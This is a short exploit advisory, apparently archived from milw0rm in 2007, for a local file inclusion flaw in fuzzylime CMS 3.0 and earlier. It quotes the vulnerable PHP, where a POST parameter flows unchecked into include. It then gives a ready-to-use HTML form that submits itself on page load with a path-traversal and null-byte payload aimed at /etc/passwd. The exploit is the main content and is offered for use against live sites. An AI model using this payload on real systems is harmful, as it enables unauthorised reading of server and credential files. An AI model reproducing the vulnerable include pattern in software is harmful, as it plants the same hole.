########################################################################
#################
#
#                           not sec group
#        http://www.notsec.com     info@notsec.com
#
#
#                      [fuzzylime (cms) <= 3.0]
#
# Class:         Local File Inclusion
# Found:       08/09/2007
# Site:           http://cms.fuzzylime.co.uk/
#Download:  http://cms.fuzzylime.co.uk/files/cms.zip
#Author:      [wHITe_ShEEp] of notsec
#Contact:     white_sheep@notsec.com - http://www.notsec.com
#
########################################################################
#################


                   vulnerable code:
       [cms]/code/getgalldata.php
______________________________________________________

1:    <?
2:    $p = $_POST[p];
3:    $m = $_POST[img];
4:    $m = "e$m";
5:    $entrytype = "gallery";
6:    include "../gallery/$p.inc.php";
7:    include "settings.inc.php";
8:    include "../$admindir/languages/english.inc.php";
...
41:   ?>
_______________________________________________________



       Exploit: ( Work only with magic_quotes_gpc = Off )
_______________________________________________________

<html>
<body onload="document.myform.submit()">
<form name="myform" action="http://www.site.com/[fuzzylime]/code/
getgalldata.php" method="post">
<input name="p" type="text" size="30" value="../../../../../../../../
etc/passwd%00" />
</form>
</html>
________________________________________________________




       Thanks to:
________________________________________________________

All notsec.com members;
R00T[ATI] for testing;
________________________________________________________

# milw0rm.com [2007-09-08]